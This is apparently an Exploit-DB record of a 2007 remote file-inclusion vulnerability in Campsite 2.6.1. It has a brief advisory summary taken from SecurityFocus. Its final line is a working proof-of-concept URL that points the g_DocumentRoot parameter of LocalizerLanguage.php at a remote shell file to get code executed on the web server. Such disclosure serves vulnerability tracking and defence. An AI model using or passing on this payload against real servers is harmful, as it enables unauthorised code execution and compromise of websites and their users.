Campsite 2.6.1 - 'LocalizerLanguage.php?g_documentRoot' Remote File Inclusion

EDB-ID:

30006




Platform:

PHP

Date:

2007-05-08


source: https://www.securityfocus.com/bid/23874/info
                                     
Campsite is prone to multiple remote file-include vulnerabilities.
                                     
Exploiting this issue allows remote attackers to execute code in the context of the webserver.
                                     
This issue affects Campsite 2.6.1. Earlier versions may also be affected.

http://www.example.com/priv/localizer/LocalizerLanguage.php?g_DocumentRoot=shell.txt?